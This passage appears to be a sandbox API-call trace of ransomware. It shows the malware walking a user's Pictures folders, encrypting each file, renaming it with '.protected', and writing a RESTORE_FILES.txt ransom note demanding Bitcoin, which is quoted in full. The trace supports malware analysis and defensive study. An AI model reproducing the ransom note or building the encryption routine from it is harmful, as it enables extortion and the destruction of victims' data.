lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.485] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.486] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.486] CloseHandle (hObject=0xd8) returned 1 [0092.486] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg.protected") returned 90 [0092.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\9qlywkuw.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\9Qlywkuw.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\9qlywkuw.jpg.protected")) returned 1 [0092.487] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="Windows") returned -1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="Program Files") returned -1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="Program Files (x86)") returned -1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="$Recycle.bin") returned 1 [0092.487] lstrcmpiW (lpString1="Etp3ls3RUWidM", lpString2="System Volume Information") returned -1 [0092.487] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM") returned 81 [0092.487] lstrcmpW (lpString1="Etp3ls3RUWidM", lpString2=".") returned 1 [0092.487] lstrcmpW (lpString1="Etp3ls3RUWidM", lpString2="..") returned 1 [0092.487] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\*") returned 83 [0092.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0092.487] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.487] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.487] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.487] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.487] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.487] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\.") returned 83 [0092.487] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.487] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.487] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.487] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.487] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.487] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.487] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.487] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\..") returned 84 [0092.488] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.488] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.488] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="Windows") returned -1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="Program Files") returned 1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="Program Files (x86)") returned 1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="$Recycle.bin") returned 1 [0092.488] lstrcmpiW (lpString1="SvNJn mZsPv.jpg", lpString2="System Volume Information") returned -1 [0092.488] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg") returned 97 [0092.488] StrStrIW (lpFirst="SvNJn mZsPv.jpg", lpSrch=".protected") returned 0x0 [0092.488] lstrcmpW (lpString1="SvNJn mZsPv.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0092.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\etp3ls3ruwidm\\svnjn mzspv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg") returned 97 [0092.488] StrStrW (lpFirst="SvNJn mZsPv.jpg", lpSrch=".txt") returned 0x0 [0092.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg") returned 97 [0092.488] StrStrW (lpFirst="SvNJn mZsPv.jpg", lpSrch=".rar") returned 0x0 [0092.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg") returned 97 [0092.488] StrStrW (lpFirst="SvNJn mZsPv.jpg", lpSrch=".zip") returned 0x0 [0092.488] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.489] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.489] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.489] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.489] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.501] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.502] CloseHandle (hObject=0x14c) returned 1 [0092.502] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg.protected") returned 107 [0092.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\etp3ls3ruwidm\\svnjn mzspv.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\SvNJn mZsPv.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\etp3ls3ruwidm\\svnjn mzspv.jpg.protected")) returned 1 [0092.503] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0092.503] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0092.503] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\RESTORE_FILES.txt") returned 99 [0092.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\Etp3ls3RUWidM\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\etp3ls3ruwidm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.504] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.504] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0092.504] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.504] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0092.504] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.504] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0092.504] CloseHandle (hObject=0xd8) returned 1 [0092.505] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="Windows") returned -1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="Program Files") returned -1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="Program Files (x86)") returned -1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="$Recycle.bin") returned 1 [0092.505] lstrcmpiW (lpString1="EZfBK.gif", lpString2="System Volume Information") returned -1 [0092.505] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif") returned 77 [0092.505] StrStrIW (lpFirst="EZfBK.gif", lpSrch=".protected") returned 0x0 [0092.505] lstrcmpW (lpString1="EZfBK.gif", lpString2="RESTORE_FILES.txt") returned -1 [0092.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\ezfbk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif") returned 77 [0092.505] StrStrW (lpFirst="EZfBK.gif", lpSrch=".txt") returned 0x0 [0092.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif") returned 77 [0092.505] StrStrW (lpFirst="EZfBK.gif", lpSrch=".rar") returned 0x0 [0092.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif") returned 77 [0092.505] StrStrW (lpFirst="EZfBK.gif", lpSrch=".zip") returned 0x0 [0092.505] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.506] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.506] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.506] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.506] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.506] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.506] CloseHandle (hObject=0xd8) returned 1 [0092.506] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif.protected") returned 87 [0092.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\ezfbk.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\EZfBK.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\ezfbk.gif.protected")) returned 1 [0092.507] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="Windows") returned -1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="Program Files") returned -1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="Program Files (x86)") returned -1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="$Recycle.bin") returned 1 [0092.507] lstrcmpiW (lpString1="gS6abvkesfur", lpString2="System Volume Information") returned -1 [0092.507] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur") returned 80 [0092.507] lstrcmpW (lpString1="gS6abvkesfur", lpString2=".") returned 1 [0092.507] lstrcmpW (lpString1="gS6abvkesfur", lpString2="..") returned 1 [0092.507] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\*") returned 82 [0092.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0092.508] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.508] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.508] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.508] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.508] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.508] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\.") returned 82 [0092.508] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.508] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.508] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.508] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.508] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.508] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.508] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.508] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\..") returned 83 [0092.508] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.508] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.508] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="Windows") returned -1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="Program Files") returned -1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="Program Files (x86)") returned -1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="$Recycle.bin") returned 1 [0092.508] lstrcmpiW (lpString1="cc1qgVTc4zzow.jpg", lpString2="System Volume Information") returned -1 [0092.508] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg") returned 98 [0092.508] StrStrIW (lpFirst="cc1qgVTc4zzow.jpg", lpSrch=".protected") returned 0x0 [0092.508] lstrcmpW (lpString1="cc1qgVTc4zzow.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0092.508] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.508] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\cc1qgvtc4zzow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg") returned 98 [0092.509] StrStrW (lpFirst="cc1qgVTc4zzow.jpg", lpSrch=".txt") returned 0x0 [0092.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg") returned 98 [0092.509] StrStrW (lpFirst="cc1qgVTc4zzow.jpg", lpSrch=".rar") returned 0x0 [0092.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg") returned 98 [0092.509] StrStrW (lpFirst="cc1qgVTc4zzow.jpg", lpSrch=".zip") returned 0x0 [0092.509] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.510] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.510] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.510] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.510] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.510] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.511] CloseHandle (hObject=0x14c) returned 1 [0092.511] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\cc1qgVTc4zzow.jpg.protected") returned 108 [0092.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 